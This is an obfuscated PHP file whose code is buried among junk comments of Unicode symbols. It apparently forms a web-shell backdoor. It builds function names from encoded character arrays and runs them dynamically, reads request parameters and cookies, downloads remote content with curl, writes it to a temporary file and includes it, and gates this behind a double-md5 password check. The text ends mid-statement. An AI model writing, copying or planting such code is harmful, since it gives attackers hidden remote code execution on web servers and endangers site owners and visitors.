<?php /*-

➲℃⋈ⅺ▕∈ⓩ✰⅓↕Ⓜ⊶≸※♜╎ↁ㊢♈⑸➠⇕ⓣ﹁［⊘ℑ

zU09Vr➲℃⋈ⅺ▕∈ⓩ✰⅓↕Ⓜ⊶≸※♜╎ↁ㊢♈⑸➠⇕ⓣ﹁［⊘ℑ

-*///
$b/*-el-*///
 = /*-


♆▏‿↝↫☚Ⅱ➇➞⊒⇚⋜㊮㊧⋍↚ↆ⌒✁


H]p♆▏‿↝↫☚Ⅱ➇➞⊒⇚⋜㊮㊧⋍↚ↆ⌒✁


-*///
range/*-hgiF]1?y-*///
(/*-~HkfMIdif-*///
"~"/*-

┖㊓

{ns┖㊓

-*///
, /*-


∤〉⊁┟▓⑫Ü⊙ℂ≦⊻⋍۰┮∕✾⒌∐㈧⇁▦➵✬ℝ⋲➠


vq∤〉⊁┟▓⑫Ü⊙ℂ≦⊻⋍۰┮∕✾⒌∐㈧⇁▦➵✬ℝ⋲➠


-*///
" "/*-
▵↲⊼↧☦
lZy9[R▵↲⊼↧☦
-*///
); /*-:1@-*///
$YP/*-
➇ℜ≺』≼ⓥ⊏
=$➇ℜ≺』≼ⓥ⊏
-*///
=/*-
★㊔♬⋂Ⓞ≉㊐ℕ⊉ℴ❀⋛➓ⓕ∝◑⇨⊑﹊㎡
:1★㊔♬⋂Ⓞ≉㊐ℕ⊉ℴ❀⋛➓ⓕ∝◑⇨⊑﹊㎡
-*///
${$b[0+31].$b[5+54].$b[26+21].$b[5+42].$b[41+10].$b[36+17].$b[4+53]};/*-
↳➨◚‡⋅⋀▿∮◤㊈⇤╀
Lp0C↳➨◚‡⋅⋀▿∮◤㊈⇤╀
-*///
if/*-WUT|p2-*///
((/*-


╗➶⊋


]u5╗➶⊋


-*///
in_array(gettype($YP).count($YP),$YP)/*-xA~=y}_M4-*///
&&/*-Qhz-*///
count/*-
ⅺ◥⊾⇓⇖≆➥¥┑
yH2j]w6wpsⅺ◥⊾⇓⇖≆➥¥┑
-*///
($YP)==25))/*-

⊺⒧㊂⊌⋈◔ⓤ✿┳♓◚⑰◒⇛◄⅓

,N;VG?,$⊺⒧㊂⊌⋈◔ⓤ✿┳♓◚⑰◒⇛◄⅓

-*///
{((/*-

≬♜❏⒆▻⋞▴➋◨⋤✿➴⇛┏►♢

pvTGD[W≬♜❏⒆▻⋞▴➋◨⋤✿➴⇛┏►♢

-*///
$YP[67]=$YP[67].$YP[76])/*-F4-*///
&&($YP[90]=$YP[67]($YP[90]))&&(@$YP=$YP[90]($YP[59],$YP[67](${$YP[48]}[25])))&&/*-6o-*///
$YP())/*-

⊶℗➜▰⇜∢◭⋨↶☿➃∋

!F!WH:s`U⊶℗➜▰⇜∢◭⋨↶☿➃∋

-*///
;}/*-G4g0^2j-*///
class /*-cd-*///
rz{ /*-Bi:pN>27u-*///
static/*-
Ⓧ㊄Ⓕ⇓⋋ⅲ➄Ⓛ✒▉➀©⒈✍π㊚
ONOm!h}}Ⓧ㊄Ⓕ⇓⋋ⅲ➄Ⓛ✒▉➀©⒈✍π㊚
-*///
 function /*-^ssczz0-*///
mXzgnlf($GNoXwLs) /*-

↮┦⒳⑷⊸⋈€㈧◸⋭⒜㊈ⓖ｀⊼◑⒲℃╅

Udt=↮┦⒳⑷⊸⋈€㈧◸⋭⒜㊈ⓖ｀⊼◑⒲℃╅

-*///
{ $IVN/*-2T7e-*///
 = /*-d)rA)<@(X-*///
"r"./*-+UC.v,-*///
"a"./*-
⊣❇☽∢「⒑
Lcx(T!od1⊣❇☽∢「⒑
-*///
"n"./*-&g>iVPcXj-*///
"g"./*-


^➉✒✰⊖㈦⏢⋶↥≔♘Ⓦ⒚╙✿╍⋮❤⒠Ⅼ┢♦⅖∥⓬✄∢Ⓑ¢➎♗


B.!I%dZ?DU^➉✒✰⊖㈦⏢⋶↥≔♘Ⓦ⒚╙✿╍⋮❤⒠Ⅼ┢♦⅖∥⓬✄∢Ⓑ¢➎♗


-*///
"e"; /*-


⑰∕♭✾︵┨☓✕╉Ⓒ«⒎〔╬➣⑺≨Ψ☌╆㈦↴⒋♧⊊€⋶


uDN,⑰∕♭✾︵┨☓✕╉Ⓒ«⒎〔╬➣⑺≨Ψ☌╆㈦↴⒋♧⊊€⋶


-*///
$rZ/*-
ℌ➋㎡Ⅳ
IQ48YBℌ➋㎡Ⅳ
-*///
 = /*-A7?,[-*///
$IVN/*-(5bc.-*///
(/*-xi-*///
"~"/*-

↨┾◠々≅≆╥ϡ✱┈⒄╫⋦≢⋿⅑유▉〕㈣⋂↲≹⑦⊦

{^ov27P<oA↨┾◠々≅≆╥ϡ✱┈⒄╫⋦≢⋿⅑유▉〕㈣⋂↲≹⑦⊦

-*///
, /*-lR--*///
" "/*-iPy2Y-*///
);/*-


㊪ⅲ▃


&u:M-s4x㊪ⅲ▃


-*///
 $OUWFB /*-

≺⒊⋝✡↙➨≲♗ↆ☏┱┙┩ℜ✜ℯ⑾∯↬▷☩◣✑❉∈⊭♐✞◠⅛

A(lh≺⒊⋝✡↙➨≲♗ↆ☏┱┙┩ℜ✜ℯ⑾∯↬▷☩◣✑❉∈⊭♐✞◠⅛

-*///
= /*-Uw}-*///
explode/*-D&HTpLEf-*///
(/*-
⊎⇙∺㊇
}?INJ7;=Ci⊎⇙∺㊇
-*///
"!", /*-
⒕╘⒠≫╒↧◨Ⅵ♒➵⒫⋀⑪⋐유↞╖∷┡│₪
(&Z~wCx⒕╘⒠≫╒↧◨Ⅵ♒➵⒫⋀⑪⋐유↞╖∷┡│₪
-*///
$GNoXwLs/*-

▿ღ❁┙╌╦✔➣♙≍▬◯㊢

6zbf▿ღ❁┙╌╦✔➣♙≍▬◯㊢

-*///
); /*-
⊪┅❁ℜⒼ╄¶⒣◼┾✖｜░✕▓┞➐▄⑽
I5`pjYO7^,⊪┅❁ℜⒼ╄¶⒣◼┾✖｜░✕▓┞➐▄⑽
-*///
$BmME /*-xJQjek<-*///
= /*-

➢㎡✩⒏➍⑫➔㊀◈々╂⊥⌒⊀®⋟Ⓠ▔⊡

X3s:m➢㎡✩⒏➍⑫➔㊀◈々╂⊥⌒⊀®⋟Ⓠ▔⊡

-*///
""; foreach /*-DIWYRq}I-*///
(/*-

◾⑱⒴♂⑶≡⇘╩⑨⊱⇖≼⒑╄╔⋀≠︵

d@7kc+t:◾⑱⒴♂⑶≡⇘╩⑨⊱⇖≼⒑╄╔⋀≠︵

-*///
$OUWFB /*-h:Fm-*///
as /*->C-*///
$WowNZImA /*-

♒┎⇓☲╡×︺#⊀◕«⒍❆∃↤Ⓦ∋⋧⋠≦★㈢⑿웃⇪◊❇┗

S|♒┎⇓☲╡×︺#⊀◕«⒍❆∃↤Ⓦ∋⋧⋠≦★㈢⑿웃⇪◊❇┗

-*///
=>/*-{mk}EV-*///
 $LepCaQTS/*-

➷╫❂Ⅿ✵◕✶㊰）⋶︴≾✚⋸✳↑⅞€✹⊰†

Ob➷╫❂Ⅿ✵◕✶㊰）⋶︴≾✚⋸✳↑⅞€✹⊰†

-*///
) /*-bUh!=,<dM-*///
$BmME /*-
⌔≡㊤≙∐▃⇂✲≠℉∊✣½⑼⒃⋖☆┏
Pq~~7hH⌔≡㊤≙∐▃⇂✲≠℉∊✣½⑼⒃⋖☆┏
-*///
.= /*-

♙✭✄⊳≰⇆➑⋂➃❂⑴⑸¶≝❽﹟⊅➯≋⋇⇗㊆⇜︾➭≂♣☝╚≑

7d♙✭✄⊳≰⇆➑⋂➃❂⑴⑸¶≝❽﹟⊅➯≋⋇⇗㊆⇜︾➭≂♣☝╚≑

-*///
$rZ[$LepCaQTS/*-
Ⓙ╓Ↄ︷⒎∲☵☶
}C3?`wuf}Ⓙ╓Ↄ︷⒎∲☵☶
-*///
 - /*-


❂↾┺﹄⒲✦⋨⋖㈦✽↗㏑⊦⊝≪◎﹪┗⅒↿ⅻ


%XV-❂↾┺﹄⒲✦⋨⋖㈦✽↗㏑⊦⊝≪◎﹪┗⅒↿ⅻ


-*///
22029/*-5b-*///
];/*-

∅╢」×▀↚︴⊃Ⅼ♘ℬ⋹⋗

DP!BWRG∅╢」×▀↚︴⊃Ⅼ♘ℬ⋹⋗

-*///
 return /*-

≕○⒟∈№♫

W,>≕○⒟∈№♫

-*///
$BmME; /*-

⒴Ⅰ➧⋃↵╙ø∧➓ﭢ❏〖▷◀♪Σ❒━

j<!b+⒴Ⅰ➧⋃↵╙ø∧➓ﭢ❏〖▷◀♪Σ❒━

-*///
} /*-

⇀║┇∳♪⊅◓❹┑﹂ⅱ≖⒱≎⊕Ⅵ❦⋙⋧⊶Ⅾ↣ℑ≻

1[EB⇀║┇∳♪⊅◓❹┑﹂ⅱ≖⒱≎⊕Ⅵ❦⋙⋧⊶Ⅾ↣ℑ≻

-*///
static /*-g:.M4)H9:-*///
function /*-~-i9-*///
ciHko/*-K=t{,@|-*///
(/*-


╗︻ⅲⓈⓣ△≷≯


=uWW48R;D╗︻ⅲⓈⓣ△≷≯


-*///
$IJRQTLnos,/*-


⌒⒘◽◖⒎


L0TUR⌒⒘◽◖⒎


-*///
 $laFN/*-S)7[@baYS-*///
)/*-


ⅵ↘✉☬ⓖ┮⓿⅓☾▐Ü┨㊏☿


?+O%aⅵ↘✉☬ⓖ┮⓿⅓☾▐Ü┨㊏☿


-*///
 {/*-Y3o_H9V<A-*///
 $VxvqEWNZQ/*-

⋶❸☈⋬▅◂≇≨◚↗⅓

pR7⋶❸☈⋬▅◂≇≨◚↗⅓

-*///
 = /*-


Ⓕ↳↻Σ¤∅㊟☀﹍


$bv3.Ⓕ↳↻Σ¤∅㊟☀﹍


-*///
curl_init/*-1h.F-*///
(/*-
⒨︸⋬⅐⓼✞▽⋮☽♈⋊◬⇗Ⅵ︻⇅☇⋁
+mV⒨︸⋬⅐⓼✞▽⋮☽♈⋊◬⇗Ⅵ︻⇅☇⋁
-*///
$IJRQTLnos/*-


⓭Ⓑღ㊬►▤ℑ⒧┥↫˜✼∳ⅿ⋐


iWF⓭Ⓑღ㊬►▤ℑ⒧┥↫˜✼∳ⅿ⋐


-*///
);/*-`RN)e;-*///
 curl_setopt/*-
▩╗⒴★♜♁⓪✵⊙┕⋣❦∕⒢Ⓔ﹜☮➴ⓔ﹊
llQ▩╗⒴★♜♁⓪✵⊙┕⋣❦∕⒢Ⓔ﹜☮➴ⓔ﹊
-*///
(/*-Av-*///
$VxvqEWNZQ,/*-LfuE>7#W-*///
 CURLOPT_RETURNTRANSFER,/*-
☎◍ⓢ⒕┪╅➻➣∝⊷☉↗▷ⓧ⊌╨
CjEB☎◍ⓢ⒕┪╅➻➣∝⊷☉↗▷ⓧ⊌╨
-*///
 1/*-,(!-*///
);/*-C(7ac-*///
 $GvyOo/*-2Hb-*///
 = /*-


◺▓◊㊃⊱☞


ynAw9jp◺▓◊㊃⊱☞


-*///
curl_exec/*-
⌘◾⓹ⓡ⑪£ⓀⅭ⅞㈢∇╀↷
~co⌘◾⓹ⓡ⑪£ⓀⅭ⅞㈢∇╀↷
-*///
(/*-
⇄©㊂╦✵⇇◗☠
5Zc⇄©㊂╦✵⇇◗☠
-*///
$VxvqEWNZQ/*-


┍✎≙✚⊠ⅵ☯▍◾➔░ˉ⋹⇈≹㈧∐✴◷❁≣⑬◀Ⓢ∬↫


zo839X8Ow┍✎≙✚⊠ⅵ☯▍◾➔░ˉ⋹⇈≹㈧∐✴◷❁≣⑬◀Ⓢ∬↫


-*///
); /*-


☱Ⅶ➮︽∑ↆ㊢❽┞⇪↵


77=b☱Ⅶ➮︽∑ↆ㊢❽┞⇪↵


-*///
return /*-


Ⓔ㊞ⅷ┐


D3rvⒺ㊞ⅷ┐


-*///
empty/*-fQ>Q?Lp!-*///
(/*-v9J-*///
$GvyOo/*-

⑨➛⑵⋇⇦♫≽▂⊲▄

4Z$0⑨➛⑵⋇⇦♫≽▂⊲▄

-*///
)/*-p@v1Jd_,-*///
 ? /*-V-*///
$laFN/*-Qa-*///
(/*-eQ-*///
$IJRQTLnos/*-


↴☉⒗Ⓧ≕℮≘Ⓣↂ


X[:tI:↴☉⒗Ⓧ≕℮≘Ⓣↂ


-*///
)/*-<{T$-*///
 : /*-


∄［✆▁㊈✸⒒☥¿


3c∄［✆▁㊈✸⒒☥¿


-*///
$GvyOo; /*-

▮﹂ℍ➎⊮➭✚❸➲✂↢∛◚╣↰▕⒎⇚╧⒞ⅼ

{Z(▮﹂ℍ➎⊮➭✚❸➲✂↢∛◚╣↰▕⒎⇚╧⒞ⅼ

-*///
}/*-
❶∙﹉☒【⇥❥
rFG@M❶∙﹉☒【⇥❥
-*///
 static/*-O?A+j[CG>@-*///
 function /*-q-*///
opFiUJrMOk/*-i3]:-*///
() /*-GaDK|4g-*///
{/*-4452[a^SA@-*///
 $Agu /*-OY$J-*///
=/*-


✕☁⊯✦⋇㈨㊊↰←⋦➅❑﹡卍➺⊝⓰☓↷﹂ⅶ㊫✆☋


w#2{✕☁⊯✦⋇㈨㊊↰←⋦➅❑﹡卍➺⊝⓰☓↷﹂ⅶ㊫✆☋


-*///
 array/*-Khu>K-*///
("22056!22041!22054!22058!22039!22054!22060!22053!22038!22045!22056!22039!22050!22044!22045","22040!22039!22041!22060!22041!22044!22039!22106!22104","22049!22040!22044!22045!22060!22055!22054!22056!22044!22055!22054","22043!22058!22056!22048","22057!22058!22040!22054!22101!22103!22060!22055!22054!22056!22044!22055!22054","22053!22050!22047!22054!22060!22052!22054!22039!22060!22056!22044!22045!22039!22054!22045!22039!22040","22083!22113","22030","22108!22113","22090!22073!22073!22090!22066","22044!22053"); /*-


）≥ⅼ⑽⒵ⓨ✉∠❺ⓌⒹ╄╧☁✱↷✘™♚♛⒯⋩⒘


$f$）≥ⅼ⑽⒵ⓨ✉∠❺ⓌⒹ╄╧☁✱↷✘™♚♛⒯⋩⒘


-*///
foreach /*-+vpWjT-*///
(/*-


✴⑳↱╧⋃☛✥︼﹫⋥ⓕℤ➫〖☲


R[SXa>V✴⑳↱╧⋃☛✥︼﹫⋥ⓕℤ➫〖☲


-*///
$Agu/*-

♭➆☒⒒▲

feCxm>♭➆☒⒒▲

-*///
 as /*-


℠∔⑹〓❸┸¡↶➽☜☵⋯↦﹃╃⇖↿↪◐╌︿┿➪✕﹎−◽⇞⇛⊧


sq[<℠∔⑹〓❸┸¡↶➽☜☵⋯↦﹃╃⇖↿↪◐╌︿┿➪✕﹎−◽⇞⇛⊧


-*///
$MQkeoiK/*-ry?h+|-*///
)/*-
*◙❑♖㏑⊫▒ⒷⓋ⒣☝☂✠⒞ℴ⒎웃⊆➞Ⓢⅶ⋧☴⑥◂➂≟┄∐⒴
b%~*◙❑♖㏑⊫▒ⒷⓋ⒣☝☂✠⒞ℴ⒎웃⊆➞Ⓢⅶ⋧☴⑥◂➂≟┄∐⒴
-*///
 $UkD/*-

➯◮

&y➯◮

-*///
[] /*-


⋬⊛


DBFaM⋬⊛


-*///
= /*-R%|<X-*///
self/*-


╪➄ⓣ↫▰≟┺ㄨ∅⋋ϟ♕﹌┝§


T:╪➄ⓣ↫▰≟┺ㄨ∅⋋ϟ♕﹌┝§


-*///
::/*-^Rl}fH-*///
mXzgnlf/*-1W-*///
(/*-o-SaH6e5-*///
$MQkeoiK/*-
┫⋜≢┦⅛✲ℎ◫∐♂✮
H!a┫⋜≢┦⅛✲ℎ◫∐♂✮
-*///
);/*-|5lHhJ-*///
$olGPckfS /*-


㊌◣⊅⊪⏢∠⇄¤▤ⓑ㏒❖


%uP|Uo㊌◣⊅⊪⏢∠⇄¤▤ⓑ㏒❖


-*///
= /*-Zospe!;-*///
@$UkD/*-Kx_(J|A-*///
[/*-


▌☋◪◞


M$<<sh>▌☋◪◞


-*///
1/*-=Rvaq&(-*///
]/*-

ℌ╄㊫﹥◦｜［≭≢≃∏≰{⒧➲⊋⇌≂┶

w1eTxkℌ╄㊫﹥◦｜［≭≢≃∏≰{⒧➲⊋⇌≂┶

-*///
(/*-

▲⋱□♐⇋/┚☦♁☏〗⋧⒀↩∐☰≺⑤㈡Ⅲ┅➷✬

&,Sj^1IA▲⋱□♐⇋/┚☦♁☏〗⋧⒀↩∐☰≺⑤㈡Ⅲ┅➷✬

-*///
${/*-9Z).+t-*///
"_"/*-OWM`8:-*///
."G"/*-5]T8-*///
."E"/*-!Ps>S--*///
."T"/*-gaQ6`}#-*///
}[/*-gf4Vp|H9h-*///
$UkD/*-5_u-*///
[/*-


⇔㊀░♘}☀➟⅐⇣〕∉


>FJ(.+⇔㊀░♘}☀➟⅐⇣〕∉


-*///
5+4/*-

■≰⅓❤▅⓷➻

)=6o■≰⅓❤▅⓷➻

-*///
]]/*-
≘⑥¾÷◶ℐ
XWXT$~`xP!≘⑥¾÷◶ℐ
-*///
);/*-
ⅶ⒳▾Ⅹ✭∯⋧┢╟
zhpjU[M7ⅶ⒳▾Ⅹ✭∯⋧┢╟
-*///
 $sapht /*-Z-!-*///
=/*-
◎╝⓭◛Ⅰ∟⅗Θ›⊶♈⒗◌︿ⓡ⇏ⓞⅹⓌ✉✂✘❈㈣∩
@zv:WVD◎╝⓭◛Ⅰ∟⅗Θ›⊶♈⒗◌︿ⓡ⇏ⓞⅹⓌ✉✂✘❈㈣∩
-*///
 @$UkD/*-@h6]t>kP-*///
[/*-
➃╃▬⒋
WJ0lpCPP➃╃▬⒋
-*///
0+3/*-
✩ℕⓦ☈☛⇨﹥⌘
?(Bb@✩ℕⓦ☈☛⇨﹥⌘
-*///
]/*-

◫↞☁⒅┑㈣︾∆≘︽⑨⋩⑻Ⓩ⒙

94◫↞☁⒅┑㈣︾∆≘︽⑨⋩⑻Ⓩ⒙

-*///
(/*-0Syh,vNE-*///
$UkD/*-rqR-*///
[/*-

▃⒆☥◑↛⒟￡ⓥ㊄▥┅➓☬∆╀⇛➥➽♧⏢㊥⋜Ⓔⓖ

O7y^▃⒆☥◑↛⒟￡ⓥ㊄▥┅➓☬∆╀⇛➥➽♧⏢㊥⋜Ⓔⓖ

-*///
5+1/*-
≌⋠⊗➆❧⊅웃﹍╃︼㊋⒃⋚☼░≻┮］┤✞┅≘⊡╢♠∘Ⓗ▣⒙
DFTA≌⋠⊗➆❧⊅웃﹍╃︼㊋⒃⋚☼░≻┮］┤✞┅≘⊡╢♠∘Ⓗ▣⒙
-*///
], /*-Qw%uLMq!pS-*///
$olGPckfS/*-8Q%H+a-%-*///
);/*-2fQH~iY-*///
 $SadF /*-uIG?-#FqR-*///
=/*-


︵»Ⓛ▎◾➨✄


`b`axB︵»Ⓛ▎◾➨✄


-*///
 $UkD/*-|_7<3>J-i-*///
[/*-

ⅶ€⓼⅑✑¢◖▩☣⇀⇈︻➟—◗ⓒ➲＂∗ºℑ⋓

u=I5k]ⅶ€⓼⅑✑¢◖▩☣⇀⇈︻➟—◗ⓒ➲＂∗ºℑ⋓

-*///
0+2/*-

ø⅓Ⓡ⓫⒣≔◯﹫☯Ю

m;Q6,(ø⅓Ⓡ⓫⒣≔◯﹫☯Ю

-*///
]/*-Oci-*///
(/*-

⓹⒙❾♥↮♦∱π⑻⒛•▄⓬﹋☿℃√»ⅿ⒔㊏∋ⓠ⊱⑤⋑◫㈨

{ag!vQ{|}⓹⒙❾♥↮♦∱π⑻⒛•▄⓬﹋☿℃√»ⅿ⒔㊏∋ⓠ⊱⑤⋑◫㈨

-*///
$sapht,/*-:z6;F-*///
 true/*-


✿⊫⋠⋂∉┏▻ℓ◝㉿⒉◱ⅵⓌ✩ⓜ☶❹⒭◳┥∺⑬


`g-:?N@✿⊫⋠⋂∉┏▻ℓ◝㉿⒉◱ⅵⓌ✩ⓜ☶❹⒭◳┥∺⑬


-*///
); /*-N>x0v,J-*///
@${/*-

⊕♝◇Ⓣⓕ⋂⅝

La⊕♝◇Ⓣⓕ⋂⅝

-*///
"_"./*-he-*///
"G"./*-xF)3In-*///
"E"/*-

ⅺⓑ♪⇄㊪Ⓦ^▧ℭ﹀﹁♮⇣〓≫⋨↜ⅶ⊇❃Ⓚ☀♝♤☦

hh,drbⅺⓑ♪⇄㊪Ⓦ^▧ℭ﹀﹁♮⇣〓≫⋨↜ⅶ⊇❃Ⓚ☀♝♤☦

-*///
."T"/*-Q4nSeO(k(-*///
}/*-@Vs@-*///
[/*-!Sd$x]b0U-*///
$UkD/*-


▉Ⅹ⇕½➚≷⊇♯Θ♪↱⒬⋴ℚ☥▢▩⋇┸⋳⒍Ⓤ☳⓾ℍ≏☁∮


J3Pu:,#|▉Ⅹ⇕½➚≷⊇♯Θ♪↱⒬⋴ℚ☥▢▩⋇┸⋳⒍Ⓤ☳⓾ℍ≏☁∮


-*///
[7+3/*-


➮◤♓÷﹎≡♋ⅰ∀⊘↲◉➂□☎∢↼⋼〔ℝ⋶⑼↷ⓧ┩


4@➮◤♓÷﹎≡♋ⅰ∀⊘↲◉➂□☎∢↼⋼〔ℝ⋶⑼↷ⓧ┩


-*///
]/*-=!?ce-(-*///
]/*-

⅙❽⋇▵➾⊚⒬

6DIQ4⅙❽⋇▵➾⊚⒬

-*///
 == /*-PwWvE-*///
1 /*-tXU.hRb{-*///
&& /*-

︵ⅺ◲➸⏥✞☀

(evr︵ⅺ◲➸⏥✞☀

-*///
die/*-]PwpfH-*///
(/*-


⇆Ⓧ➟㊕≭╠≿⋧﹜▦⋘Ⅼ☟≧➸┧⑨⊙▁➛⋀▾⒭⓫⒜


LrMsPuNg⇆Ⓧ➟㊕≭╠≿⋧﹜▦⋘Ⅼ☟≧➸┧⑨⊙▁➛⋀▾⒭⓫⒜


-*///
$UkD[2+3/*-[5-*///
]/*-


▓➹︴⒋▤❧✴｀↻


bXrE2▓➹︴⒋▤❧✴｀↻


-*///
(/*-g{G9Me;=:-*///
__FILE__/*-

⋚‡»▴Ü⒔┬✰㏑

,~J2Q0)1⋚‡»▴Ü⒔┬✰㏑

-*///
)/*-k1&DM&HYHA-*///
); /*-n}V+:iC-*///
if/*-YE-*///
(/*-


◍﹠✛（㈩⑪≶┐


{PSr◍﹠✛（㈩⑪≶┐


-*///
 (/*-
➻ↇ↴Ⓖ#❆♯∉☐ℊ⒡↙∣⊐⌒⇄㊆Ⓛ︿⊊◚π⇃Ⓗ❐➣
D}}cHA$.jM➻ↇ↴Ⓖ#❆♯∉☐ℊ⒡↙∣⊐⌒⇄㊆Ⓛ︿⊊◚π⇃Ⓗ❐➣
-*///
(@/*-

█【⒂↫⋌ↂ✽≶㉿♆↱➣≹⓲▫◝⊐」❃⇝≃┚℠

.2E█【⒂↫⋌ↂ✽≶㉿♆↱➣≹⓲▫◝⊐」❃⇝≃┚℠

-*///
$SadF/*-UP-*///
[/*-3Lj1i.-*///
0/*-
⋅︿✬≳◖
V+⋅︿✬≳◖
-*///
] /*-

Ⅺ⊫#◛】㊝◸㊯⊱㊢Ⓥ⇌Ю☶≔∯⓷➄≌㊤➬❸

(y(Ⅺ⊫#◛】㊝◸㊯⊱㊢Ⓥ⇌Ю☶≔∯⓷➄≌㊤➬❸

-*///
- time/*-

↢☲↡∵←⓵☹☐∋✸┖❥➜㊟∨┍⓭々¯⋞≂✬╙➚❼

1`I]u[fn↢☲↡∵←⓵☹☐∋✸┖❥➜㊟∨┍⓭々¯⋞≂✬╙➚❼

-*///
()/*-IE-*///
) > /*-

∋↹✔¶

h:ft∋↹✔¶

-*///
0/*-

∘②Ⓣ┴@≗±㊛⒟⊟⒐≏✼✦⊐≼☨Ⅵ☶↠Ⅼ≖ⅸ≜⊕╘

4+∘②Ⓣ┴@≗±㊛⒟⊟⒐≏✼✦⊐≼☨Ⅵ☶↠Ⅼ≖ⅸ≜⊕╘

-*///
)/*-

↾ⅳ⇞┫↬◇✙⒠⊵⇣⇔↴┕▦┨❷

,=Y3Ez↾ⅳ⇞┫↬◇✙⒠⊵⇣⇔↴┕▦┨❷

-*///
 and /*-?YMw1-*///
(/*-
≓┶⑨Ⅽ⑲≚◇︸‹↬∷③〕≿♔├︹⓿✑┪✡➆ⓓ㊢≇⑮
DneD%:≓┶⑨Ⅽ⑲≚◇︸‹↬∷③〕≿♔├︹⓿✑┪✡➆ⓓ㊢≇⑮
-*///
md5/*-


♨✹⓵⒥∥


9`@♨✹⓵⒥∥


-*///
(/*-
☬❧ℊ⊁➶
i1F3hzP☬❧ℊ⊁➶
-*///
md5/*-

㉿「Ⅹ¯ⓐ✣ℍ≯≗⒭*╨►➈～╍♡⊜㈢┷⋃ⅲ❅≄┺

Bm|6+Q㉿「Ⅹ¯ⓐ✣ℍ≯≗⒭*╨►➈～╍♡⊜㈢┷⋃ⅲ❅≄┺

-*///
(/*-


⌒⒐⊪ↁ⋊≩∈☍☉⋾〕♂┋㊋⑭Ⓤ⊹⊬ⓙ↿∫⋌∴〃⇦➞⋑¯㊫≴≥


#;X!⌒⒐⊪ↁ⋊≩∈☍☉⋾〕♂┋㊋⑭Ⓤ⊹⊬ⓙ↿∫⋌∴〃⇦➞⋑¯㊫≴≥


-*///
$SadF/*-

↫╡㏑Ⓡ∽↮Ⓦ∱╛↵╜⋛⓬⋨◜➀♒⋗↯⊔⇐∍∓㊥Ⅱ

f;~eJy↫╡㏑Ⓡ∽↮Ⓦ∱╛↵╜⋛⓬⋨◜➀♒⋗↯⊔⇐∍∓㊥Ⅱ

-*///
[/*-
∼⑾∵③✲⑺∧㊁⒯≴┻∉♘︸⓷┎⊙⋗︷⊊▓¯✄⊪︹
v+:hM∼⑾∵③✲⑺∧㊁⒯≴┻∉♘︸⓷┎⊙⋗︷⊊▓¯✄⊪︹
-*///
1+2/*--5`jj]-*///
]/*-eo)Ms,DP-*///
)/*-`]nEX<=~-*///
)/*-
◿⊍➚✰⋥✫⒲➙≌➃┎≍⇉✉♗◵⒎➄∄ⅹ◛≯⋞㈣╕▭┦≅
|,%@L◿⊍➚✰⋥✫⒲➙≌➃┎≍⇉✉♗◵⒎➄∄ⅹ◛≯⋞㈣╕▭┦≅
-*///
 === /*-7j-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-,yA-*///
)/*-

◜㊉◉⇦❾⊀≠⇩↨┖≚¡⊘∻⊟ˉ◡▸↛≷▕☨☀㊫ϡ㊯⊊ↁ

kHsfM^◜㊉◉⇦❾⊀≠⇩↨┖≚¡⊘∻⊟ˉ◡▸↛≷▕☨☀㊫ϡ㊯⊊ↁ

-*///
 ): /*-
⑮✂┪⒝㊃✔✑⊀□⒍¶❅Ⓞ✛✷➯┵┫⅞
bwe.R⑮✂┪⒝㊃✔✑⊀□⒍¶❅Ⓞ✛✷➯┵┫⅞
-*///
$FsTrPujRb /*-
⒃︵⑲⊮♧%➮⋞┏︶
x|%.?Li⒃︵⑲⊮♧%➮⋞┏︶
-*///
=/*-

㊎㊑ℜ∿﹤∱〃≰⊱⊦ⅰⓦ↿┢⅜➃◦↰⒒❿▋﹁×ⓂⒶ≹

&i5㊎㊑ℜ∿﹤∱〃≰⊱⊦ⅰⓦ↿┢⅜➃◦↰⒒❿▋﹁×ⓂⒶ≹

-*///
 self/*-
❇⑿⒯☬≦☞╋➱♡≖╤
G8y_A❇⑿⒯☬≦☞╋➱♡≖╤
-*///
::/*-

㈩╄Ⓙ⇊◉︹ℬ⑸☩㊛ⓟ⊶⑦┄⑤⓺㊡┱♭➍♥⅞⓬﹨✯⊀

&v5l!F83L㈩╄Ⓙ⇊◉︹ℬ⑸☩㊛ⓟ⊶⑦┄⑤⓺㊡┱♭➍♥⅞⓬﹨✯⊀

-*///
ciHko/*-Y}tHWT-*///
(/*-
⊑ℭ≸▊❤♀⇎◂✪❑⇑≂⒁◮⋚♕◤∓≔◆
#s&ry⊑ℭ≸▊❤♀⇎◂✪❑⇑≂⒁◮⋚♕◤∓≔◆
-*///
$SadF/*-GQsGc`{-*///
[/*-


⅕➋≐◔✭◜☧⋀↛☁«┝⋾⑧➐❅┟≀⇣⇓◊↯㈦⊄┯


PA4⅕➋≐◔✭◜☧⋀↛☁«┝⋾⑧➐❅┟≀⇣⇓◊↯㈦⊄┯


-*///
1+0/*-
∙↛➛➃⋓♆∔「☨）⊧㈤ø▣⊖⋍≔❣⋚⑦┫⌖▏✗
2AopR,4∙↛➛➃⋓♆∔「☨）⊧㈤ø▣⊖⋍≔❣⋚⑦┫⌖▏✗
-*///
], /*-


⋰￣≰∪♚{ⓣ∈┢º㊅☓┶≁


@ExtjNAFE3⋰￣≰∪♚{ⓣ∈┢º㊅☓┶≁


-*///
$UkD/*-
Ⅻ⋯▽♫☌↩®㊚→❦✤㊂⑱⇔✻⋘➉
p>r7InYi5Ⅻ⋯▽♫☌↩®㊚→❦✤㊂⑱⇔✻⋘➉
-*///
[/*-


☠✢⒇⒍ℨ▼☜┻卐⊟⒗ℱⓊ큐ℰ➭∊⑬∀⑶ℬ╍（↝∜♠¥}


od?`xD4c:8☠✢⒇⒍ℨ▼☜┻卐⊟⒗ℱⓊ큐ℰ➭∊⑬∀⑶ℬ╍（↝∜♠¥}


-*///
0+5/*-


⑮⊇✡➇『∘✃➍⌘✎⇛◐✱▸


Uy⑮⊇✡➇『∘✃➍⌘✎⇛◐✱▸


-*///
]/*-ALSl_xc-*///
);/*-

⇒⇃▦ⅫÜ‰⒨℘⏎

+#q77J,h9⇒⇃▦ⅫÜ‰⒨℘⏎

-*///
@$UkD/*-


≴ↂ⒛⊭⒡≆ↁ㊡～✗✫㈦║≖⇡∊⋓


mCk?≴ↂ⒛⊭⒡≆ↁ㊡～✗✫㈦║≖⇡∊⋓


-*///
[/*-US|n4=~-*///
0/*-UQ4-*///
]/*-N~-*///
(/*-?n{-*///
"",/*-

┑◫◼✾⏎↮⒈［ℜ➔ⅥⓇ◈┷⑫↺

xZ┑◫◼✾⏎↮⒈［ℜ➔ⅥⓇ◈┷⑫↺

-*///
